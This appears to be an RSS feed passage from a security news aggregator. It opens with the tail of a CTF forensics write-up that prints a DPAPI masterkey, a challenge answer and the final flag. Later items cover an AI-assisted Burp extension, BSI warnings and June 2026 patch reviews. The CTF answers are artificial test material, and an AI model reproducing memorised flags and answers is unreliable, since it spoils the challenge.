/masterkey:"d96486156b7651c31945791790941b62f180d198c06966e7e9568d594375c760cf528e6bf55a3bd6dc1bec079b38cbb569a222444ffce861b71a61330ddd1"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/820/1*qhpnzdCAvttlY2pf8U0OMA.png"><figcaption><strong>FINALLY</strong></figcaption></figure><p>lets decode this encoded base64 data with cyberchef “<a href="https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)&amp;input=ZFhNeGJtZGZiVFJ6ZEROeVgyc3plVjkwTUY5a00yTnllWEIwWDBSUVFWQkpYMlZ1WTNKNWNIUXpaRjl6TTJOeU0zUno"><strong>link</strong></a>”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/707/1*eCpSy434mV-LpDgh57IOVg.png"><figcaption>OMG!</figcaption></figure><pre>14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?<br>Answer: us1ng_m4st3r_k3y_t0_d3crypt_DPAPI_encrypt3d_s3cr3ts</pre><p>now we can submit all answers and get the flag</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lGNgwO5Dahi9uwAaHJqp4g.png"></figure><pre>IEEE{Ins1d3r_Thr34t_0r_Just_A_Mad_Dev3l0per}</pre><h4>Thanks For Reading, Hope you enjoyed❤️</h4><p>Keep in touch with me via:</p><p><a href="https://www.linkedin.com/in/loay-salah"><strong>LinkedIn</strong></a></p><p><strong>Discord</strong>: prankster99</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=3b49a1afe7f6" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/ieee-mansb-ctf-2025-dfir-writeup-3b49a1afe7f6">IEEE Victoris 4.0 — CTF 2025 — Quals DFIR Challenges</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How I Built a Burp Extension Efficiently with Claude]]></title>
<description><![CDATA[The hardest part of building a Burp extension used to be the code — now it’s just coming up with the idea.I recently used Claude to create a Burp Extension that highlights nonstandard HTTP Headers to help security researchers identify potential vectors for injection.Simply prompting Claude gave i...]]></description>
<link>https://tsecurity.de/de/3591626/hacking/how-i-built-a-burp-extension-efficiently-with-claude/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591626/hacking/how-i-built-a-burp-extension-efficiently-with-claude/</guid>
<pubDate>Thu, 11 Jun 2026 21:05:59 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fWvPJBaIeXu95_yEFC5miQ.png"></figure><p>The hardest part of building a Burp extension used to be the code — now it’s just coming up with the idea.</p><p>I recently used Claude to create a <a href="https://github.com/Raymond-JV/header-hunter">Burp Extension</a> that highlights nonstandard HTTP Headers to help security researchers identify potential vectors for injection.</p><p>Simply prompting Claude gave inspiration for the extension. I learned that common HTTP headers exist in the <strong>IANA</strong> registry and can be used as a filter.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*JWP1dPlnyfLbwZNOTRAyPA.png"><figcaption>Brainstorming an idea</figcaption></figure><p>A few simple prompts allowed Claude to build a prototype from scratch.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vwPsKk_GWTjfvH5tg17RrQ.png"></figure><p>Claude suggests using <strong>Montoya API</strong>, the newer extension framework from Portswigger.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*loajA3xovclnsrk-fXWL4Q.png"><figcaption>Creating a prototype</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1k7QOmqRXJZCH5lRPuMprg.png"><figcaption>Highlighted requests</figcaption></figure><p>Ironically, the final 20% of fine tuning took the longest time. I simply suggested small features and implemented them gradually until the project was finished.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*E-wDhKi_zjfVNwcl5g55Lw.png"><figcaption>Adding a configuration tab</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*aKxJOvWVgCFvLmVEFnvn4g.png"><figcaption>Configuration Tab</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YAG_zyP08SZROd7WCwWtxA.png"><figcaption>Including support for adding and removing wordlists</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rgnEOKi5cTdy6RflAtniRQ.png"><figcaption>Updated repository</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*UbI8NiV1twGEa9dFU4cjNQ.png"><figcaption>Including regex patterns in filter</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wa_wiyGJ3bGWDo_dQTUUkA.png"><figcaption>Updated configuration</figcaption></figure><p>Building this extension with Claude was fast and fun. It felt like I was having a conversation most of the time.</p><p>Though, a word of caution, near the end I did encounter a few bugs that Claude couldn’t resolve. It is important that you know how to code well and are capable of manual analysis else you will hit a brick wall when things become too complex.</p><p><a href="https://github.com/Raymond-JV/header-hunter">Raymond-JV/header-hunter: Burp Suite extension that automatically flags non-standard HTTP headers in proxy traffic, helping you spot custom application headers that may reveal internal infrastructure, debug endpoints, or attack surface.</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=85d43817b8f3" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-built-a-burp-extension-efficiently-with-claude-85d43817b8f3">How I Built a Burp Extension Efficiently with Claude</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[BSI warnt: Kritische Schwachstelle in IBM WebSphere Application Server]]></title>
<description><![CDATA[BONN / LONDON (IT BOLTWISE) – Das BSI hat ein Update zu mehreren Schwachstellen in IBM WebSphere Application Server veröffentlicht. Laut Meldung liegt die Risikostufe bei 4 (hoch) mit einem CVSS-Base Score von 9,8 und Remote-Angriffsmöglichkeit. Betroffen sind unter anderem WebSphere Application ...]]></description>
<link>https://tsecurity.de/de/3589894/it-security-nachrichten/bsi-warnt-kritische-schwachstelle-in-ibm-websphere-application-server/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589894/it-security-nachrichten/bsi-warnt-kritische-schwachstelle-in-ibm-websphere-application-server/</guid>
<pubDate>Thu, 11 Jun 2026 10:52:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-bsi-websphere-security-update.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-bsi-websphere-security-update.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-bsi-websphere-security-update-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-bsi-websphere-security-update-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-bsi-websphere-security-update-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-bsi-websphere-security-update-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-bsi-websphere-security-update-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BONN / LONDON (IT BOLTWISE) – Das BSI hat ein Update zu mehreren Schwachstellen in IBM WebSphere Application Server veröffentlicht. Laut Meldung liegt die Risikostufe bei 4 (hoch) mit einem CVSS-Base Score von 9,8 und Remote-Angriffsmöglichkeit. Betroffen sind unter anderem WebSphere Application Server sowie weitere IBM-Produkte rund um Registry/Repository, Business Automation Workflow und Rational ClearQuest. […]</p>
<div><a href="https://www.it-boltwise.de/bsi-warnt-kritische-schwachstelle-in-ibm-websphere-application-server.html">... den vollständigen Artikel <strong>»BSI warnt: Kritische Schwachstelle in IBM WebSphere Application Server«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/bsi-warnt-kritische-schwachstelle-in-ibm-websphere-application-server.html">BSI warnt: Kritische Schwachstelle in IBM WebSphere Application Server</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[BSI warnt: Red Hat Quay kann per Remote-Angriff beliebigen Code ausführen]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Das BSI meldet Sicherheitslücken in Red Hat Quay mit einem CVSS-Base Score von 7,1 und warnt vor Remote-Angriffen durch einen authentisierten Angreifer. Laut Hinweis sind neben UNIX auch die Container-Registry selbst betroffen und können zur Ausführung beliebigen Codes sowi...]]></description>
<link>https://tsecurity.de/de/3589807/it-security-nachrichten/bsi-warnt-red-hat-quay-kann-per-remote-angriff-beliebigen-code-ausfuehren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589807/it-security-nachrichten/bsi-warnt-red-hat-quay-kann-per-remote-angriff-beliebigen-code-ausfuehren/</guid>
<pubDate>Thu, 11 Jun 2026 10:12:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-red-hat-quay-vulnerability-bsi.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-red-hat-quay-vulnerability-bsi.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-red-hat-quay-vulnerability-bsi-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-red-hat-quay-vulnerability-bsi-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-red-hat-quay-vulnerability-bsi-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-red-hat-quay-vulnerability-bsi-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-red-hat-quay-vulnerability-bsi-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Das BSI meldet Sicherheitslücken in Red Hat Quay mit einem CVSS-Base Score von 7,1 und warnt vor Remote-Angriffen durch einen authentisierten Angreifer. Laut Hinweis sind neben UNIX auch die Container-Registry selbst betroffen und können zur Ausführung beliebigen Codes sowie zu serverseitigen Request-Forgery-Angriffen (SSRF) missbraucht werden. Für Unternehmen zählt jetzt vor allem […]</p>
<div><a href="https://www.it-boltwise.de/bsi-warnt-red-hat-quay-kann-per-remote-angriff-beliebigen-code-ausfuehren.html">... den vollständigen Artikel <strong>»BSI warnt: Red Hat Quay kann per Remote-Angriff beliebigen Code ausführen«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/bsi-warnt-red-hat-quay-kann-per-remote-angriff-beliebigen-code-ausfuehren.html">BSI warnt: Red Hat Quay kann per Remote-Angriff beliebigen Code ausführen</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rekord-Patch Day: Microsoft schließt über 200 Sicherheitslücken]]></title>
<description><![CDATA[Bei seinem Patchday am 9. Juni hat Microsoft Sicherheits-Updates gegen 206 neue Sicherheitslücken bereitgestellt. Das ist ein neuer Rekordwert – der bisherige lag bei 175 im Oktober 2025. Neben Windows und Office sind auch Exchange Server und Microsofts Cloud-Dienste betroffen. Eine der Lücken wi...]]></description>
<link>https://tsecurity.de/de/3586789/it-nachrichten/rekord-patch-day-microsoft-schliesst-ueber-200-sicherheitsluecken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3586789/it-nachrichten/rekord-patch-day-microsoft-schliesst-ueber-200-sicherheitsluecken/</guid>
<pubDate>Wed, 10 Jun 2026 09:32:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Bei seinem Patchday am 9. Juni hat Microsoft Sicherheits-Updates gegen 206 neue Sicherheitslücken bereitgestellt. Das ist ein neuer Rekordwert – der bisherige lag bei 175 im Oktober 2025. Neben Windows und Office sind auch Exchange Server und Microsofts Cloud-Dienste betroffen. Eine der Lücken wird bereits für Angriffe ausgenutzt. Ganze 38 Schwachstellen stuft Microsoft als kritisch ein, die übrigen sind alle als hohes Risiko ausgewiesen.</p>



<p>Die Details zu den Schwachstellen bietet Microsoft zum Selbstsuchen im <a href="https://msrc.microsoft.com/update-guide/" target="_blank" rel="noreferrer noopener">Leitfaden für Sicherheitsupdates</a>. Deutlich übersichtlicher bereitet Dustin Childs im <a href="https://www.zerodayinitiative.com/blog/" target="_blank" rel="noreferrer noopener">Blog von Trend Micro ZDI</a> das Thema Update-Dienstag auf – stets auch mit Blick auf Admins, die Unternehmensnetzwerke betreuen.</p>



<p><strong>Die wichtigsten Sicherheitslücken beim Patch Day im Juni 2026</strong></p>



<figure class="wp-block-table is-style-stripes"><table class="has-fixed-layout"><thead><tr><th>CVE</th><th>anfällige Software</th><th>Schwere­grad</th><th>Aus­wirkung</th><th>aus­genutzt</th><th>vorab bekannt</th><th>CVSS</th></tr></thead><tbody><tr><td>CVE-2026-41091</td><td>Windows Defender</td><td>hoch</td><td>EoP</td><td>ja</td><td>ja</td><td>7.8</td></tr><tr><td>CVE-2026-50507</td><td>Bitlocker („GreenPlasma“)</td><td>hoch</td><td>SFB</td><td>nein</td><td>ja</td><td>6.8</td></tr><tr><td>CVE-2026-47288</td><td>Windows Kernel</td><td>kritisch</td><td>RCE</td><td>nein</td><td>nein</td><td>9.8</td></tr><tr><td>CVE-2026-47291</td><td>Windows, HTTP-Dienst</td><td>kritisch</td><td>RCE</td><td>nein</td><td>nein</td><td>9.8</td></tr><tr><td>CVE-2026-44815</td><td>Windows, DHCP-Client</td><td>kritisch</td><td>RCE</td><td>nein</td><td>nein</td><td>9.8</td></tr><tr><td>CVE-2026-45472<br>+ 6 weitere</td><td>Office</td><td>kritisch</td><td>RCE</td><td>nein</td><td>nein</td><td>8.4</td></tr></tbody></table></figure>



<h2 class="wp-block-heading toc">Edge-Update stopft Chromium 0-Day-Lücke</h2>



<p>Das neueste Sicherheits-Update auf Edge 149.0.4022.62 ist vom 9. Juni und basiert auf Chromium 149.0.7827.103. Es behebt <a href="https://www.pcwelt.de/article/3161334/notfall-update-google-stopft-0-day-lucke-in-chrome-2.html" target="_blank" rel="noreferrer noopener">74 Chromium-Schwachstellen</a>, die bei der oben genannten Gesamtlückenanzahl ebenso wenig eingerechnet sind wie die <a href="https://www.pcwelt.de/article/3157218/mit-dem-update-auf-chrome-149-schliest-google-uber-400-browser-lucken.html" target="_blank" rel="noreferrer noopener">über 400 Chromium-Lücken</a> aus der Vorwoche. Auch eine 0-Day-Lücke in der Chromium-Basis (CVE-2026-11645) wird damit beseitigt.</p>



<h2 class="wp-block-heading toc">Etliche Office-Lücken gestopft</h2>



<p>In seinen Office-Produkten hat Microsoft 54 Schwachstellen beseitigt, doppelt so viele wie im Mai. Darunter sind 25 RCE-Lücken (remote code execution), von denen neun als kritisch eingestuft sind. Bei diesen ist bereits das Vorschaufenster ein Angriffsvektor – ein Benutzer muss eine präparierte Datei nicht erst mit Office öffnen, um eine erfolgreiche Attacke zu ermöglichen. Die übrigen RCE-Lücken können ausgenutzt werden, wenn ein Benutzer eine präparierte Office-Datei in einem anfälligen Office-Produkt öffnet (open-and-own).</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" data-type="link" data-id="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<h2 class="wp-block-heading toc">Schwachstellen in Windows</h2>



<p>Ein großer Anteil der Schwachstellen, diesmal 118, verteilt sich über die verschiedenen Windows-Versionen (10, 11, Server), für die Microsoft noch Sicherheits-Updates anbietet. Windows 10 wird weiterhin ganz normal als betroffenes System genannt, obwohl die Unterstützung im Oktober 2025 offiziell ausgelaufen ist – das lief bei Windows 7 noch anders, trotz ESU-Programm (Erweiterte Sicherheits-Updates).</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h3 class="wp-block-heading toc">Windows Defender unter Beschuss</h3>



<p>Die einzige Sicherheitslücke in diesem riesigen Update-Paket, die bereits aktiv ausgenutzt wird, ist die EoP-Lücke (Elevation of Privilege = Rechteerweiterungen) CVE-2026-41091 in Microsoft Defender. Ein Angreifer kann sich im Erfolgsfall Systemberechtigungen verschaffen. Microsoft bedankt sich bei verschiedenen Personen für die Meldung dieser Schwachstelle. Das lässt den Schluss zu, dass die Angriffe recht breit gestreut sein könnten.</p>



<p>Die anfällige Malware Protection Engine hat Microsoft bereits durch die täglichen automatischen Defender-Updates ersetzt. Das abgesicherte Modul trägt mindestens die Versionsnummer 1.1.26040.8. Um zu prüfen, ob ihr Rechner diese Modulversion schon hat, gehen Sie in Windows 11 auf <em>Einstellungen » Datenschutz und Sicherheit » Windows-Sicherheit » [Windows-Sicherheit öffnen] » Einstellungen » Info</em> (siehe Abbildung). Bei Windows 10 beginnt die Reise bei <em>Einstellungen » Update &amp; Sicherheit » [Windows-Sicherheit öffnen]</em> und geht dann weiter wie bei Windows 11.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a2912a790ee4"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/mmpe-version-win11.webp?w=1200" alt="Version der Malware Protection Engine prüfen" class="wp-image-3161348" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><em>Prüfen Sie die Version der Malware Protection Engine</em></figcaption></figure><p class="imageCredit">fz</p></div>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie das Betriebssystem stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html">Die besten Antivirus-Programme 2025 im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<h3 class="wp-block-heading toc">Kritische Windows-Lücken</h3>



<p>Unter den 118 Schwachstellen in Windows, die Microsoft in diesem Monat beseitigt, sind 19 als kritisch eingestufte RCE-Lücken. Besonders problematisch ist CVE-2026-47288 im Windows-Kernel mit einem CVSS-Score von 9.8. Ein Angreifer kann aus der Ferne ohne Authentifizierung eingeschleusten Code mit Systemrechten ausführen. Dustin Childs schätzt diese Lücke als Wurm-tauglich ein.</p>



<p>Auch CVE-2026-47291 im HTTP-Dienst (http.sys) kommt auf einen CVSS-Score von 9.8. Auch hier kann ein Angreifer im Erfolgsfall Code einschleusen und ausführen, ohne sich authentifizieren zu müssen. Wenn auf Ihren System allerdings der Standardwert für <em>MaxRequestBytes</em> in der Registry steht, ist das System nicht anfällig. Wie Sie das bei Bedarf erreichen, beschreibt Microsoft im <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291" data-type="link" data-id="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291" target="_blank" rel="noreferrer noopener">Security Bulletin</a> zu dieser Schwachstelle, inklusive Powershell-Script. Die DoS-Lücke CVE-2026-49160 in http.sys war schon vorab öffentlich bekannt.</p>



<p>Mit CVE-2026-44815 im DHCP Client-Dienst folgt sogleich die dritte Schwachstelle mit einem CVSS-Score von 9.8. Dieser Dienst läuft auf allen Rechnern, ist also ein dankbares Ziel für jeden Angreifer. Der kann auch hier Code einschleusen und ausführen, ohne sich authentifizieren zu müssen.</p>



<p>Die Updates gegen die Bitlocker-Schwachstellen CVE-2026-45585 und CVE-2026-50507 zielen auf die durch den norwegischen Sicherheitsforscher Nightmare Eclipse veröffentlichten Sicherheitslücken „YellowKey“ und „GreenPlasma“ ab. Erstere hat Microsoft schon im Mai gestopft, das zugehörige Bulletin jedoch im Juni aktualisiert. Der offenbar anhaltend verärgerte Forscher hat für den 14. Juni (das ist der kommende Sonntag) bereits neues Material angekündigt.</p>



<h2 class="wp-block-heading toc">Etliche Secure-Boot-Lücken</h2>



<p>Im Juni laufen nicht nur <a href="https://www.pcwelt.de/article/3147966/das-passiert-mit-ihrem-windows-ab-juni-2026-wenn-sie-die-secure-boot-deadline-ignorieren.html" target="_blank" rel="noreferrer noopener">alte Secure-Boot-Zertifikate</a> ab, was allerlei nicht-trivialen Update-Aufwand bedeutet. Microsoft beseitigt auch noch zehn Sicherheitslücken aus der Kategorie SFB (security feature bypass), die durch unabhängige Forscher entdeckt und gemeldet wurden. Wer eine davon ausnutzen kann, könnte schädlichen Code bereits beim Systemstart laden, noch bevor Sicherheitsmaßnahmen greifen können (daher SFB).</p>



<h2 class="wp-block-heading toc">Dreimal Sandbox-Escape bei Hyper-V</h2>



<p>Die Ausnutzung der als kritsch eingestuften RCE-Lücken CVE-2026-45607, CVE-2026-45641 und CVE-2026-47652 kann es schädlichem Code ermöglichen, aus dem Gastsystem auszubrechen und Code auf dem Hostsystem auszuführen.</p>



<h2 class="wp-block-heading toc">Angriffe als Man-in-the-middle auf Exchange Server?</h2>



<p>In Exchange Server hat Microsoft acht Schwachstellen behoben. Darunter ist mit CVE-2026-45583 auch eine RCE-Lücke, die jedoch nur in einem MiTM -Szenario (machine-in-the-middle) ausnutzbar wäre. Als kritisch ist nur das Datenleck CVE-2026-48579 in Exchange Online ausgewiesen, das Microsoft bereits gestopft hat. Die drei Spoofing-Lücken haben es durchaus in sich. So könnte ein Angreifer CVE-2026-48579 ausnutzen, indem er einen Exchange-Admin dazu verleitet, einen böswilligen Link zu öffnen. Das würde ihm ermöglichen, in der Websitzung des Administrators Code mit dessen Rechten auszuführen.</p>



<p>Im Juni gibt es wieder ein neues <a href="https://www.pcwelt.de/article/1168933/microsoft-windows-tool-zum-entfernen-bosartiger-software-in-neuer-version.html" target="_blank" rel="noreferrer noopener">Windows-Tool zum Entfernen bösartiger Software</a>. Der nächste turnusmäßige Update-Dienstag ist am 14. Juli 2026.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The June 2026 Security Update Review]]></title>
<description><![CDATA[I’ve made it through Pwn2Own Berlin, had a little vacation, and now I’m back for Patch Tuesday. Microsoft and Adobe didn’t disappoint. In fact, they have heralded my return with the largest Patch Tuesday release ever. Thanks? Take a break from your regularly scheduled activities and let’s take a ...]]></description>
<link>https://tsecurity.de/de/3585580/it-security-nachrichten/the-june-2026-security-update-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585580/it-security-nachrichten/the-june-2026-security-update-review/</guid>
<pubDate>Tue, 09 Jun 2026 20:20:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">I’ve made it through Pwn2Own Berlin, had a little vacation, and now I’m back for Patch Tuesday. Microsoft and Adobe didn’t disappoint. In fact, they have heralded my return with the largest Patch Tuesday release ever. Thanks? Take a break from your regularly scheduled activities and let’s take a look at the latest security patches from Adobe and Microsoft. If you’d rather watch the full video recap covering the entire release, you can check out the Patch Report webcast on our <a href="https://www.youtube.com/playlist?list=PLeFSM_a8Jri75_5-NpydcFneOaTvr3vJE">YouTube</a> channel. It should be posted within a couple of hours after the release.</p><p class=""><strong>Adobe Patches for June 2026</strong></p><p class="">For May, June released 11 bulletins addressing 123 unique CVEs in Adobe Acrobat Reader, ColdFusion, Experience Manager, Experience Manager Forms, InDesign, InCopy, Substance 3D Sampler, Content Credentials SDK, Dreamweaver, Format Plugins, and Adobe Campaign Classic.</p><p class="">Here’s this month’s overview table:</p>





















  
  




  
    


<table>
<colgroup>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
</colgroup>
<thead>
  <tr>
    <th>Bulletin ID</th>
    <th>Product</th>
    <th>CVE Count</th>
    <th>Highest Severity</th>
    <th>Highest CVSS</th>
    <th>Exploited</th>
    <th>Deployment Priority</th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/campaign/apsb26-66.html" target="_blank">APSB26-66</a></td>
    <td>Adobe Campaign Classic</td>
    <td>2</td>
    <td>Critical</td>
    <td>10.0</td>
    <td>No</td>
    <td>1</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/coldfusion/apsb26-64.html" target="_blank">APSB26-64</a></td>
    <td>Adobe ColdFusion</td>
    <td>7</td>
    <td>Critical</td>
    <td>9.6</td>
    <td>No</td>
    <td>1</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/acrobat/apsb26-63.html" target="_blank">APSB26-63</a></td>
    <td>Adobe Acrobat Reader</td>
    <td>20</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>2</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/aem-forms/apsb26-57.html" target="_blank">APSB26-57</a></td>
    <td>Adobe Experience Manager Forms</td>
    <td>3</td>
    <td>Critical</td>
    <td>9.3</td>
    <td>No</td>
    <td>2</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/dreamweaver/apsb26-62.html" target="_blank">APSB26-62</a></td>
    <td>Adobe Dreamweaver</td>
    <td>5</td>
    <td>Critical</td>
    <td>8.6</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/formatplugins/apsb26-65.html" target="_blank">APSB26-65</a></td>
    <td>Adobe Format Plugins</td>
    <td>2</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/incopy/apsb26-59.html" target="_blank">APSB26-59</a></td>
    <td>Adobe InCopy</td>
    <td>3</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/indesign/apsb26-58.html" target="_blank">APSB26-58</a></td>
    <td>Adobe InDesign</td>
    <td>12</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/substance3d-sampler/apsb26-60.html" target="_blank">APSB26-60</a></td>
    <td>Adobe Substance 3D Sampler</td>
    <td>4</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/content-authenticity-sdk/apsb26-61.html" target="_blank">APSB26-61</a></td>
    <td>Content Credentials SDK</td>
    <td>8</td>
    <td>Critical</td>
    <td>7.5</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/experience-manager/apsb26-56.html" target="_blank">APSB26-56</a></td>
    <td>Adobe Experience Manager</td>
    <td>57</td>
    <td>Important</td>
    <td>5.4</td>
    <td>No</td>
    <td>3</td>
  </tr>
</tbody>
<tfoot>
  <tr>
    <td>TOTAL</td>
    <td>11 bulletins</td>
    <td>123</td>
    <td></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
</tfoot>
</table>



  




